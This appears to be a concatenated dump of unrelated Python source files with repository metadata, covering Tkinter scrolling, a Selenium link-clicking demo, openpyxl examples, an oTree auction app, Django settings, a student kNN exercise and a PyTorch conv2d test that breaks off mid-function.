widget.unbind_all('<Button-4>')
widget.unbind_all('<Button-5>')
widget.unbind_all('<Shift-Button-4>')
widget.unbind_all('<Shift-Button-5>')
def _on_mousewheel(event, widget):
if platform.system() == 'Windows':
widget.yview_scroll(-1*int(event.delta/120),'units')
elif platform.system() == 'Darwin':
widget.yview_scroll(-1*int(event.delta),'units')
else:
if event.num == 4:
widget.yview_scroll(-1, 'units')
elif event.num == 5:
widget.yview_scroll(1, 'units')
def _on_shiftmouse(event, widget):
if platform.system() == 'Windows':
widget.xview_scroll(-1*int(event.delta/120), 'units')
elif platform.system() == 'Darwin':
widget.xview_scroll(-1*int(event.delta), 'units')
else:
if event.num == 4:
widget.xview_scroll(-1, 'units')
elif event.num == 5:
widget.xview_scroll(1, 'units')
if __name__ == '__main__':
vp_start_gui()
| [
"itm2017008@iiita.ac.in"
] | itm2017008@iiita.ac.in |
d687fed816f59497ad6ab2dfd2601c0db090c0b8 | 15855ce729e78fa0628d0e5a774b7fcaff7acc85 | /seleniumProject/seleniumScripts/DealWithWebelements4.py | 087a8ee8b6c0c406d1c2f9bf537ee3ee23a0ce01 | [] | no_license | nikhil-shukla/GitDemo | d8c63aec6978aed251c0a4df3c5b4aacef702735 | f060716815f9ba1025ce8fc525dd10e9ddc0b2dc | refs/heads/master | 2023-07-08T22:48:26.439978 | 2021-08-16T13:25:18 | 2021-08-16T13:25:18 | 396,787,624 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 623 | py | from selenium import webdriver
from selenium.webdriver.chrome.service import Service
from selenium.webdriver.common.by import By
import time
# s=Service("F:/Study/SeleniumWebDrivers/chromedriver.exe")
driver = webdriver.Chrome("F:/Study/SeleniumWebDrivers/chromedriver.exe")
driver.maximize_window()
driver.get("https://opensource-demo.orangehrmlive.com/")
l1=driver.find_elements(By.TAG_NAME, "a")
for x in l1:
print("\n")
print(x)
#forgotLink = driver.find_element(By.LINK_TEXT, "Forgot your password?")
forgotLink = driver.find_element(By.PARTIAL_LINK_TEXT, "Forgot your")
forgotLink.click()
driver.quit() | [
"nikhilshukla912@gmail.com"
] | nikhilshukla912@gmail.com |
5a784f9267f47e84390f91db1ca4a696fddfa026 | 52c2ccb6fb55126a65bff2b4b7f653e4b0805759 | /tibiawikisql/models/__init__.py | 210e3bc5e7f40f3b77dd0e2dda1538287ab80d97 | [
"Apache-2.0"
] | permissive | Galarzaa90/tibiawiki-sql | 4907236d518cdc6a53f32645efa3b22517e91f90 | 982be5ebd7905354b6c6a31c4247b2ee21bbe943 | refs/heads/master | 2022-08-09T09:18:46.533611 | 2022-07-23T13:56:07 | 2022-07-23T13:56:07 | 108,594,636 | 22 | 11 | Apache-2.0 | 2022-06-28T16:46:13 | 2017-10-27T20:52:55 | Python | UTF-8 | Python | false | false | 1,552 | py | # Copyright 2021 Allan Galarza
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Contains all the models representing TibiaWiki articles."""
from tibiawikisql.models.abc import Parseable, Row
from tibiawikisql.models.achievement import Achievement
from tibiawikisql.models.charm import Charm
from tibiawikisql.models.creature import Creature, CreatureAbility, CreatureDrop, CreatureMaxDamage, CreatureSound
from tibiawikisql.models.house import House
from tibiawikisql.models.imbuement import Imbuement, ImbuementMaterial
from tibiawikisql.models.item import Book, Item, ItemAttribute, ItemStoreOffer, Key
from tibiawikisql.models.mount import Mount
from tibiawikisql.models.npc import Npc, NpcBuyOffer, NpcDestination, NpcOffer, NpcSellOffer, NpcSpell, RashidPosition
from tibiawikisql.models.outfit import Outfit, OutfitImage, OutfitQuest
from tibiawikisql.models.quest import Quest, QuestDanger, QuestReward
from tibiawikisql.models.spell import Spell
from tibiawikisql.models.update import Update
from tibiawikisql.models.world import World
| [
"allan.galarza@gmail.com"
] | allan.galarza@gmail.com |
922757483f5b92750a41e5763823e5796f197e37 | 1e0baa4961b734cc5c73c01b5baa5cdff2dca1bd | /create_remove_sheet_test.py | 1fc50189c43ded1f2100894f5fa18022094f1266 | [] | no_license | mallikarjunasai995/Automate-the-Boring-Stuff-with-Python-Chapter-12-Excel | d5b690781c1e1acff99a552ab4efc005b8131272 | d8e315a90780dbbe728cdad6eda2eae380aa88b7 | refs/heads/master | 2020-08-13T18:31:59.207458 | 2016-08-30T15:17:55 | 2016-08-30T15:17:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 528 | py | import openpyxl
wb = openpyxl.Workbook()
print(wb.get_sheet_names())
print(wb.create_sheet())
print(wb.get_sheet_names())
print(wb.create_sheet(index=0, title='First Sheet'))
print(wb.get_sheet_names())
print(wb.create_sheet(index=2, title='Middle Sheet'))
print(wb.get_sheet_names())
print(wb.remove_sheet(wb.get_sheet_by_name('Middle Sheet')))
print(wb.remove_sheet(wb.get_sheet_by_name('Sheet1')))
print(wb.get_sheet_names())
sheet = wb.get_sheet_by_name('Sheet')
sheet['A1'] = 'Hello world!'
print(sheet['A1'].value)
| [
"chendong333@gmail.com"
] | chendong333@gmail.com |
42ab79d67ef44fa6522a1970e74a26b4debaf35c | 86a0be02c5fd86936742efb64f8d0fa82a7c96aa | /volunteer/models.py | bb5e7a199b9ea4cb4ab3fe37a7fa41ab1d44cb2a | [] | no_license | chapkovski/every-second-auction | 8e0c5a3b46c88c17e9f7545ee89845b7021609be | a8213eeb17f9b04b4b67e3111fe49cd6d1d6e75f | refs/heads/master | 2021-01-23T10:56:56.636657 | 2018-06-20T01:08:48 | 2018-06-20T01:08:48 | 93,109,957 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,421 | py | from otree.api import (
models, widgets, BaseConstants, BaseSubsession, BaseGroup, BasePlayer,
Currency as c, currency_range
)
# from background_task import background
# from background_task.models import Task
import atexit
import subprocess
from django.db import transaction, models as dmodels
import channels
import json
from django.db import connection
from twisted.internet import task
author = 'Filipp Chapkovski, chapkovski@gmail.com'
doc = """
Your app description
"""
from django.db.models.signals import pre_save, post_save
from django.dispatch import receiver
def group_model_exists():
return 'volunteer_group' in connection.introspection.table_names()
# for p in players:
# print(p.participant.code)
class Constants(BaseConstants):
name_in_url = 'volunteer'
players_per_group = 3
num_rounds = 1
endowment = 50
instruction_template = 'volunteer/Instructions.html'
class Subsession(BaseSubsession):
def before_session_starts(self):
...
class Player(BasePlayer):
auction_winner = models.BooleanField(initial=False)
def set_payoff(self):
self.payoff = (Constants.endowment - self.group.price * self.auction_winner) * (not self.group.timeout)
class Group(BaseGroup):
price = models.IntegerField(initial=0)
activated = models.BooleanField()
timeout = models.BooleanField(initial=False)
def get_channel_group_name(self):
return 'auction_group_{}'.format(self.pk)
def advance_participants(self):
channels.Group(self.get_channel_group_name()).send(
{'text': json.dumps({'accept': True})})
def runEverySecond():
print('checking if there are active groups...')
if group_model_exists():
activated_groups = Group.objects.filter(activated=True)
for g in activated_groups:
if g.price < Constants.endowment:
g.price += 1
g.save()
channels.Group(
g.get_channel_group_name()
).send(
{'text': json.dumps(
{'price': g.price})}
)
else:
g.timeout = True
g.save()
g.advance_participants()
l = task.LoopingCall(runEverySecond)
if not l.running:
l.start(1.0)
| [
"chapkovski@gmail.com"
] | chapkovski@gmail.com |
1344bc46f555597e1654cc4a18d9b3bb99d739fe | 1065fe984e4dfe4e164e09f72a96b183cecdc94f | /sencity/settings.py | 870bdab1aa9bef6facd1538c9cfe9255b88f5190 | [] | no_license | tim-vu/sencity | 6cdd0ee60c4448ea8c3e95f177b2e90d3140d396 | cecd1c03bf84e10a853be23ef2f3e6c8b9974794 | refs/heads/master | 2023-07-29T08:02:01.065283 | 2021-09-01T12:22:52 | 2021-09-01T12:22:52 | 402,050,830 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,855 | py | """
Django settings for sencity project.
Generated by 'django-admin startproject' using Django 3.0.3.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '0gi3^23uo^63%$ar3*ujla-313j8or_l5p!)tafb8b&wv_vt6a'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'hubs.apps.HubsConfig',
'incidents.apps.IncidentsConfig',
'drf_yasg',
'corsheaders',
'rest_framework',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'corsheaders.middleware.CorsMiddleware',
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'sencity.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'sencity.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.0/howto/static-files/
STATIC_URL = '/static/'
REST_FRAMEWORK = {
'DEFAULT_SCHEMA_CLASS': 'rest_framework.schemas.coreapi.AutoSchema',
'DEFAULT_RENDERER_CLASSES': (
'djangorestframework_camel_case.render.CamelCaseJSONRenderer',
'djangorestframework_camel_case.render.CamelCaseBrowsableAPIRenderer',
# Any other renders
),
'DEFAULT_PARSER_CLASSES': (
'djangorestframework_camel_case.parser.CamelCaseFormParser',
'djangorestframework_camel_case.parser.CamelCaseMultiPartParser',
'djangorestframework_camel_case.parser.CamelCaseJSONParser',
),
}
CORS_ORIGIN_ALLOW_ALL = True
| [
"tim.vuegen@hotmail.com"
] | tim.vuegen@hotmail.com |
7cf2b1b60761c5b530a5da47afc9898a2f48d0c4 | 2ab78b5953537a7a7318afe55924656af36e9c01 | /202003-ai-labtest-results/Submissions/17057696.py | d2e602f226f6b37669ad4a7f3560ad84d8d30118 | [] | no_license | ricwtk/misc | 9ed67b329840d6fb3ad9ee0e20ced99d57b9c89c | 994e2967736e5afa0a017d2df55ed48f31641886 | refs/heads/master | 2022-07-30T06:24:52.304591 | 2022-07-12T02:06:47 | 2022-07-12T02:06:47 | 188,970,865 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,365 | py | import pandas as pd
from sklearn.model_selection import train_test_split
from sklearn.neighbors import KNeighborsClassifier
import matplotlib.pyplot as plt
from matplotlib import cm
from matplotlib.colors import ListedColormap
import numpy as np
# import glass.csv as DataFrame
data = pd.read_csv("glass.csv", names=["Id", "RI", "Na", "Mg", "Al", "Si", "K", "Ca", "Ba", "Fe", "Glass type"], index_col=0)
''' Instructions
1. split the data into 70% training and 30% testing data
- use Na, Mg, Al, Si, K, Ca, Ba, and Fe (i.e. all columns except Glass type) as the input features.
- use Glass type as the target attribute.
2. plot the accuracy of knn classifiers for all odd value of k between 3 to 100, i.e. k = 3, 5, 7, ..., 100. This is achieved by fulfilling the following tasks:
i. create a loop to
A. fit the training data into knn classifiers with respective k.
B. calculate the accuracy of applying the knn classifier on the testing data.
C. print out the accuracy for each k.
ii. plot a line graph with the y-axis being the accuracy for the respective k and x-axis being the value of k. You DO NOT need to save the graph.
'''
# start your code after this line --------------------------------------------------------------------------------------
input_column = ["Na", "Mg", "Al", "Si", "K", "Ca", "Ba", "Fe"]
x = input_column
y = data['Glass type']
x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.3)
#SECOND TASK: KNN CLASSIFIER
start, end = 3, 100
k = 0
for i in range(start, end + 1):
if i % 2 != 0:
k = k + 1
print(k)
knc = KNeighborsClassifier(k)
input_columns = data['attributes'].columns[:2].tolist()
x_train = data['train']['attributes'][input_columns]
y_train = data['train']['target'].species
knc.fit(x_train, y_train)
x_test = data['test']['attributes'][input_columns]
y_test = data['test']['target'].species
y_predict = knc.predict(x_test)
print(pd.DataFrame(list(zip(y_test,y_predict)), columns=['target', 'predicted']))
print(f'Accuracy: {knc.score(x_test,y_test):.4f}')
colormap = cm.get_cmap('tab20')
cm_dark = ListedColormap(colormap.colors[::2])
cm_light = ListedColormap(colormap.colors[1::2])
x_min = data['attributes'][input_columns[0]].min()
x_max = data['attributes'][input_columns[0]].max()
x_range = x_max - x_min
x_min = x_min - 0.1 * x_range
x_max = x_max + 0.1 * x_range
y_min = data['attributes'][input_columns[1]].min()
y_max = data['attributes'][input_columns[1]].max()
y_range = y_max - y_min
y_min = y_min - 0.1 * y_range
y_max = y_max + 0.1 * y_range
xx, yy = np.meshgrid(np.arange(x_min, x_max, .01*x_range),
np.arange(y_min, y_max, .01*y_range))
z = knc.predict(list(zip(xx.ravel(), yy.ravel())))
z = z.reshape(xx.shape)
plt.figure(figsize=[12,8])
plt.pcolormesh(xx, yy, z, cmap=cm_light)
plt.scatter(x_train[input_columns[0]], x_train[input_columns[1]],
c=y_train, label='Training data', cmap=cm_dark,
edgecolor='black', linewidth=1, s=150)
plt.scatter(x_test[input_columns[0]], x_test[input_columns[1]],
c=y_test, marker='*', label='Testing data', cmap=cm_dark,
edgecolor='black', linewidth=1, s=150)
plt.xlabel(input_columns[0])
plt.ylabel(input_columns[1])
plt.legend()
| [
"ricwtk@gmail.com"
] | ricwtk@gmail.com |
986c674c72844f58e048f8216519e9f4e8400d50 | 0fb136802af06082a981bdb3a89db436be273ea2 | /ata/ata_timer/migrations/0005_employee_team_id.py | 19320a183f215e6b0dab56bf5eeae536c48c03dd | [] | no_license | ata333/wasem_task | 654b6ef30c59795f9a8dc72ad3377a9855d06950 | 1d49ffbdb41518ddca77ffdf5ba8c0a9b67a0fe1 | refs/heads/main | 2023-02-17T01:23:01.383078 | 2021-01-20T12:26:39 | 2021-01-20T12:26:39 | 331,279,223 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 490 | py | # Generated by Django 3.1.5 on 2021-01-16 10:54
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('ata_timer', '0004_remove_employee_team_id'),
]
operations = [
migrations.AddField(
model_name='employee',
name='team_id',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='ata_timer.team'),
),
]
| [
"ataaburajabedx@gmail.com"
] | ataaburajabedx@gmail.com |
c606d65881d68d6ccbea9e9dca2d271c3fbb4b90 | 4210b6df0fb265285d3fb57c694042190a51deb5 | /init-tables.py | 15d41119f2cf73bbae50fda7709ace285e698b06 | [] | no_license | ryebread8303/gw2api-py | 21ee8020947b23ba0c7b03a5d3e82d5919778b2b | d1668eb738cbaf4e96d3ffdd5c73132711b64557 | refs/heads/master | 2020-12-24T20:33:36.484155 | 2016-05-22T20:44:03 | 2016-05-22T20:44:03 | 59,261,033 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,084 | py | #!/usr/bin/python2
import requests,json
import sqlite3 as sql
import sys
def jsonreq(uri):
return json.loads((requests.get(uri)).text)
def insertitem(idnum,name,nosell):
cur.execute("INSERT INTO Items VALUES(?,?,?)",(idnum,name,nosell))
baseapi = "https://api.guildwars2.com/v2"
item_list = jsonreq(baseapi+"/items")
pagecount = len(item_list)/200
con = None
try:
con = sql.connect('items.db')
cur = con.cursor()
cur.execute("DROP TABLE IF EXISTS Items")
cur.execute("DROP TABLE IF EXISTS Prices")
cur.execute("CREATE TABLE Items(Id INT, Name TEXT,NoSell BOOLEAN)")
cur.execute("CREATE TABLE Prices(Id INT, Buys INT, Sells INT, Day INT, Year IN)")
for i in range(pagecount):
print "Loading page: "+str(i+1)+" of "+str(pagecount)
items = jsonreq(baseapi+"/items?page="+str(i)+"&page_size=200")
for item in items:
item_id = item['id']
item_name = item['name']
item_nosell = 'NoSell' in item['flags']
insertitem(item_id,item_name,item_nosell)
con.commit()
except sql.Error, e:
print "Error: %s" %e.args[0]
sys.exit(1)
finally:
if con:
con.close()
| [
"ryebread8403@gmail.com"
] | ryebread8403@gmail.com |
53255a5fce27a2f72d42848404eef76c04596bdf | b9776d148da3bf9d37954d34b1ab236d41310cb2 | /product/models.py | a5d9a1154df4995cc85fccb43f48fc8043cdc8de | [] | no_license | Harshitsharma34/ResaleApp | b3cb62fa1953aa042c3ad19beb8162eba094c87a | a23187dfb05db2445ebbafa9a316e2da89b2d489 | refs/heads/master | 2022-11-05T18:29:42.140170 | 2020-06-19T17:31:33 | 2020-06-19T17:31:33 | 273,293,693 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,411 | py | from django.db import models
from django.contrib.auth.models import User
from django.utils import timezone
from django.utils.text import slugify
# Create your models here.
class Product(models.Model):
CONDITION_TYPE = (
("New", "New"),
("Used", "Used"),
("Extremely Old", "Extremely Old"),
("Old", "Old"),
)
name = models.CharField(max_length=100)
owner = models.ForeignKey(User, on_delete=models.CASCADE)
description = models.TextField(max_length=500)
condition = models.CharField(max_length=100, choices=CONDITION_TYPE)
brand = models.ForeignKey('Brand', on_delete=models.SET_NULL, null=True)
category = models.ForeignKey(
'Category', on_delete=models.SET_NULL, null=True)
price = models.DecimalField(max_digits=10, decimal_places=2)
created = models.DateTimeField(default=timezone.now)
image = models.ImageField(
upload_to='main_products/', blank=False, null=False)
slug = models.SlugField(blank=True, null=True)
def save(self, *args, **kwargs):
if not self.slug and self.name:
self.slug = slugify(self.name)
super(Product, self).save(*args, **kwargs)
def __str__(self):
return self.name
class Brand(models.Model):
# For Product Category
brand_name = models.CharField(max_length=50)
class Meta:
verbose_name = 'brand'
verbose_name_plural = 'brands'
def __str__(self):
return self.brand_name
class ProductImages(models.Model):
product = models.ForeignKey(Product, on_delete=models.CASCADE)
image = models.ImageField(upload_to='products/', blank=True, null=True)
class Meta:
verbose_name = 'product image'
verbose_name_plural = 'product images'
def __str__(self):
return self.product.name
class Category(models.Model):
# For Product Category
category_name = models.CharField(max_length=50)
image = models.ImageField(upload_to='category/', blank=True, null=True)
slug = models.SlugField(blank=True, null=True)
def save(self, *args, **kwargs):
if not self.slug and self.category_name:
self.slug = slugify(self.category_name)
super(Category, self).save(*args, **kwargs)
class Meta:
verbose_name='category'
verbose_name_plural='categories'
def __str__(self):
return self.category_name
| [
"harshitsharma34@gmail.com"
] | harshitsharma34@gmail.com |
f43f5ef928e91ce17d483b1409cabfdfee353f1a | 9dd9999d1cad18349a0354669b5696134209495e | /rate_models/sr1fsim.py | 801523aad3b7edb9ae9e04d5f094fc015e5d0c27 | [] | no_license | phetdam/prog_proj | d8edf1d8a850557bea384eaa0d89bb12fe8f72f9 | f06c5a6a755be258a371f04d2a5d69a782e5bbb5 | refs/heads/master | 2020-03-27T14:36:25.819919 | 2019-05-24T04:56:21 | 2019-05-24T04:56:21 | 146,671,870 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,788 | py | # runs simulations of and plots single-factor short rate models (cir and vasicek).
# can be specified data to calibrate models with, the type of model to run, and
# the number of processes to generate.
#
# Changelog:
#
# 10-29-2018
#
# removed PL_TITLES; the title of each plot will simply be MTYPE
#
# 10-27-2018
#
# added additional flag to specify the model to run (vasicek or cir). if model is not
# specified, the default process will be a vasicek model. changed several variable
# names and file name (from cir_main.py to sr1fsim.py) to reflect the more general
# nature of the file. added list of acceptable models and some other variables.
#
# 10-26-2018
#
# added additional flags and modes. can be calibrated off of a calibration file with
# flag -cf=file_name:data_col, and run k processes with flag -np=k. basically added a
# big chunk of boilerplate code to catch input errors. changed parameters from being
# displayed in the legend for each individual process to being displayed in the title;
# all processed in one graph have the same parameters anyways.
#
# 10-24-2018
#
# initial creation; git commit. renamed to cir_main.py, modified usage, cleaned a little
# program name
PROGNAME = "sr1fsim"
# help flag
HELP_FLAG = "--help"
# calibration flag
CF_FLAG = "-cf"
# number of processes to run
NP_FLAG = "-np"
# model type flag
MT_FLAG = "-mt"
# csv extension
CSV_EXT = ".csv"
# model names
# cox-ingersoll-ross model
CIR_N = "cir"
# vasicek model
VAS_N = "vas"
# acceptable model types to pass to MT_FLAG
MTYPES = [CIR_N, VAS_N]
# help string
HELP_STR = ("Usage: {0} [ [ {1}=csv_file:data_col ] [ {2}=model ] [ {3}=k ] ]\n"
" {0} [ {4} ]\n"
"generates stochastic short rate processes, by default 2, which will be\n"
"started with default parameters unless a data file (must be {5} file) and\n"
"a specified column of numerical data in that file is given, in which case\n"
"the process will be calibrated in an attempt to mimic the characteristics\n"
"of the data. a different number of processes k will be generated if specified.\n"
"default model run will be the vasicek model, unless a specific model is\n"
"specified at runtime with the {2} flag.\n\n"
"flags:\n\n"
"{1}\ttakes argument of form csv_file:data_col, where csv_file is the data\n"
"\tfile and data_col is the data column in the file to use for calibration.\n"
"{2}\ttakes argument model, which is the name of the model to run.\n"
"{3}\ttakes argument k, which is the number of processes to generate.\n"
"{4}\tprints this usage\n\n"
"acceptable arguments for flag {2}:\n\n"
"{6}\tcox-ingersoll-ross model\n"
"{7}\tvasicek model".format(PROGNAME, CF_FLAG, MT_FLAG, NP_FLAG, HELP_FLAG,
CSV_EXT, CIR_N, VAS_N)
)
# indicates type of model being used; default "vas" (VAS_N)
MTYPE = VAS_N
# indicates how many processes should be generated; default 2
PR_N = 2
# default configurations for models; list [a, mu, dt, sigma, n]
MODEL_PARAM = [0.03, 0.1, 0.001, 0.07, 1000]
# import matplotlib; catch exception
try:
import matplotlib.pyplot as plt
except:
print("{}: please install matplotlib.".format(PROGNAME))
quit()
# import math lib and sys
import math
import sys
# import pandas and numpy
import pandas as pd
import numpy as np
# import short_rate_1f
import short_rate_1f as sr1f
# main
if (__name__ == "__main__"):
# get length of arguments in the argv vector
argc = len(sys.argv)
# if there are no arguments
if (argc == 1):
pass
# else if there is one argument
elif (argc == 2):
# if it is the help option, print usage and exit
if (sys.argv[1] == HELP_FLAG):
print(HELP_STR)
quit()
# else pass
pass
# else if there are two or three arguments (just pass)
elif (argc == 3 or argc == 4):
pass
# else too many arguments
else:
print("{0}: too many arguments. type '{0} {1}' for usage.".format(PROGNAME, HELP_FLAG))
quit()
# will be a dataframe, if CF_FLAG is passed with the correct argument
df = None
# boolean for if a calibration file and data column have been provided, and calibration
# should be performed
c_model = False
# boolean for unknown flag error
uf_error = False
# if there are one to three arguments
if (argc >=2 and argc <= 4):
# for each argument except the program name
for i in range(1, argc):
# reference to sys.argv[i]
arg = sys.argv[i]
# if the argument contains CF_FLAG, NP_FLAGS, or MT_FLAG
if (CF_FLAG in arg or NP_FLAG in arg or MT_FLAG in arg):
# attempt to split arg by "="
s_arg = arg.split("=")
# if s_arg size is not 2, set uf_error to True and break
if (len(s_arg) != 2):
uf_error = True
break
# if s_arg[0] == CF_FLAG
if (s_arg[0] == CF_FLAG):
# split argument into file name and data column [file, col]
fnd = s_arg[1].split(":")
# if size of fnd != 2, print error and exit
if (len(fnd) != 2):
print("{0}: error: argument to {1} must be of form file:col.".format(
PROGNAME, CF_FLAG))
quit(1)
# unpack into file name, column name
fn, cn = fnd
# check file extension of file; must be CSV_EXT (.csv)
# if not, print error and exit
if (CSV_EXT not in fn):
print("{0}: error: calibration file must be a {1} file.".format(
PROGNAME, CSV_EXT))
quit(1)
# else it is, so read into dataframe (let python handle errors)
df = pd.read_csv(fn)
# try to locate column in dataframe; if not, print error and exit
if (cn not in df.columns):
print("{0}: error: column {1} not in file {2}.".format(PROGNAME, cn, fn))
quit(1)
# set c_model to True so that calibration will take place
c_model = True
# else if s_arg[0] == NP_FLAG
elif (s_arg[0] == NP_FLAG):
# attempt to cast argument to int and assign to PR_N
try:
PR_N = int(s_arg[1])
# print error and exit
except:
print("{0}: error: argument to {1} expected to be positive int.".format(
PROGNAME, NP_FLAG))
quit(1)
# if PR_N has been set to less than 1, print error and exit
if (PR_N < 1):
print("{0}: error: argument to {1} must be positive.".format(
PROGNAME, NP_FLAG))
quit(1)
# else if s_arg[0] == MT_FLAG
elif (s_arg[0] == MT_FLAG):
# if the argument is not in MTYPES (invalid), print error and exit
if (s_arg[1] not in MTYPES):
print("{0}: error: invalid argument to {1}. acceptable args: {2}".format(
PROGNAME, MT_FLAG, MTYPES))
quit(1)
# else we have a valid model, so set MTYPE to the argument
MTYPE = s_arg[1]
# else set uf_error to True and break
else:
uf_error = True
break
# else it's some random argument; set uf_error to True and break
else:
uf_error = True
break
# if there is an uf_error (unknown flag error), print error and exit
if (uf_error):
print("{0}: error: unknown flag '{1}'. type '{0} {2}' for usage.".format(
PROGNAME, arg, HELP_FLAG))
quit(1)
# if c_model is True, calibrate model
if (c_model):
# return calibration to MODEL_PARAM, using column cn in dataframe df
# do not change dt or n scale
MODEL_PARAM = sr1f.calibrate_model(df[cn])
# print model type and params
print(MTYPE, MODEL_PARAM)
# determine which model to use by binding appropriate function name to return_pr
# if we have specified cir process
if (MTYPE == CIR_N):
return_pr = sr1f.return_cir
# else if we have specified vasicek model
elif (MTYPE == VAS_N):
return_pr = sr1f.return_vas
# create figure and plot processes
# figure size width 12", height 9"
fg = plt.figure(figsize = (12, 9))
# for PR_N iterations
for i in range(PR_N):
# get x (t) and y (r) series of generated process; element 0 is time series, 1 is r
x, y = return_pr(*MODEL_PARAM, cc = i, df = False)
# plot the series; label each as MTYPE + "_i"
plt.plot(x, y, label = "{0}_{1}".format(MTYPE, i))
# format after plotting
# x label, y label (make vertical)
plt.xlabel("t")
plt.ylabel("r", rotation = 0)
# graph title; put parameters there so you don't clutter the graph
plt.title("{0} (a={1}, mu={2}, dt={3}, sigma={4}, n={5})".format(
MTYPE, *[round(e, 7)for e in MODEL_PARAM]))
# show legend
plt.legend()
# save to file MTYPE + ".png"
plt.savefig(MTYPE + ".png")
| [
"djh458@stern.nyu.edu"
] | djh458@stern.nyu.edu |
0975a9270e7422949e57a1c4734c1c3efa1d7ecb | a773e293d6e43376e3554770a1da9322b05f143b | /scratch/test/conv2d_test.py | d3417c7d4e14042585a2aee827dbf903312d820b | [
"MIT"
] | permissive | zli117/ML-From-Scratch | 11c18f8e0c843c9ada9ea02943baf9623a82e85c | cb97308ae9e297354b398dfe7a0d5fb361b866e9 | refs/heads/master | 2020-03-08T08:00:30.021522 | 2018-08-22T06:34:33 | 2018-08-22T06:34:33 | 128,009,763 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,147 | py | """
Test for convolution 2d layer
"""
import unittest
import numpy as np
import torch
from torch.autograd import Variable
from torch.nn import Conv2d
from scratch.layers.conv2d import Conv2DLayer
class TestConv2DLayer(unittest.TestCase):
def setUp(self):
self.configs = [
# in channel, out channel, kernel size, stride, padding, bias, \
# batch size, height, width
(3, 5, 5, 2, 4, False, 2, 10, 10),
(5, 2, 7, 2, 4, False, 2, 5, 5),
(5, 2, 7, 2, 4, False, 2, 15, 3),
(5, 2, 7, 2, 4, False, 2, 3, 15),
(5, 5, 3, 4, 2, False, 5, 8, 7),
(3, 5, 5, 2, 4, True, 2, 10, 10),
(5, 2, 7, 2, 4, True, 2, 5, 5),
(5, 2, 7, 2, 4, True, 2, 15, 3),
(5, 2, 7, 2, 4, True, 2, 3, 15),
(5, 5, 3, 4, 2, True, 5, 8, 7),
]
def helper_func(self, config_idx):
(in_ch, out_ch, k_size, stride, padding, has_bias, batch_size, height,
width) = self.configs[config_idx]
torch_conv2d = Conv2d(
in_ch,
out_ch,
k_size,
stride=stride,
padding=padding,
bias=has_bias)
torch_conv2d.type(torch.DoubleTensor)
conv2d_layer = Conv2DLayer(
in_ch, (k_size, k_size),
out_ch,
lambda t: torch.nn.init.normal(t, -1, 1),
stride=(stride, stride),
padding=(padding, padding),
bias=has_bias)
conv2d_layer.type(torch.DoubleTensor)
input_tensor = (torch.DoubleTensor(batch_size, in_ch, height, width)
.uniform_(-1, 1))
input_layer = Variable(input_tensor, requires_grad=True)
input_torch = Variable(input_tensor.clone(), requires_grad=True)
bias_tensor = torch.DoubleTensor(out_ch).uniform_(-1, 1)
weights = (torch.DoubleTensor(out_ch, in_ch, k_size, k_size).uniform_(
-1, 1))
torch_conv2d.weight.data.copy_(weights)
if has_bias:
torch_conv2d.bias.data.copy_(bias_tensor)
layer_weight_shape = (out_ch, in_ch * k_size * k_size)
